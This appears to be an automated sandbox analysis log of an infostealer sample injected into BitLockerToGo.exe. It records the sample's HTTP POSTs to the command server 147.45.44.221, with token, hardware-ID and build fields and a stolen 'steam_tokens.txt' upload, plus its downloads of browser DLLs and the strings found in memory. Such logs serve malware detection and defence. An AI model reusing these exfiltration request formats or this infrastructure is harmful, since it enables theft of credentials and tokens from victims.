Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCAKKKFBGDGCAKFCFHHost: 147.45.44.221Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 2d 2d 0d 0a Data Ascii: ------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="message"files------FBFCAKKKFBGDGCAKFCFH--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHIHost: 147.45.44.221Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 2d 2d 0d 0a Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file"------KEHDBAEGIIIEBGCAAFHI--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 147.45.44.221Content-Length: 131659Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECGIIIDAKJDHJKFHIEBHost: 147.45.44.221Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 2d 2d 0d 0a Data Ascii: ------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="message"ybncbhylepme------JECGIIIDAKJDHJKFHIEB--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFHost: 147.45.44.221Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HIJEGDBGDBFIJKECBAKF--
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49732 -> 147.45.44.221:80
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.221
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02756280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_02756280
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.44.221Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/sqlite3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/freebl3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/mozglue.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/msvcp140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/nss3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/softokn3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/vcruntime140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 147.45.44.221Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 39 34 30 30 32 39 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6e 66 7a 65 6f 6e 77 63 69 74 75 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="hwid"D579400290C53528003197------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build"nfzeonwcituc------DAFBGHCAKKFCAKEBKJKK--
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.php
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.php#
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.php;
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpD
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpK
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpW
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpare
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpc
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpition:
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpla
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpwser
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/freebl3.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/freebl3.dll4
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/mozglue.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/mozglue.dll8
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/mozglue.dllX
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/msvcp140.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/nss3.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/nss3.dllX
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/softokn3.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/sqlite3.dll
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/vcruntime140.dll6
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/3538548809da56b2/vcruntime140.dllW
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221/c
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221KEBFB
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.221b
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084293154.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecop
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecopnacl
Source: JEBFIIIE.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: JEBFIIIE.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: https://doi.org/GTB
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JEBFIIIE.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://mozilla.org0/
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: https://ramensoftware.com/0
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://support.mozilla.org
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1913485231.0000000022B61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1913485231.0000000022B61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ate
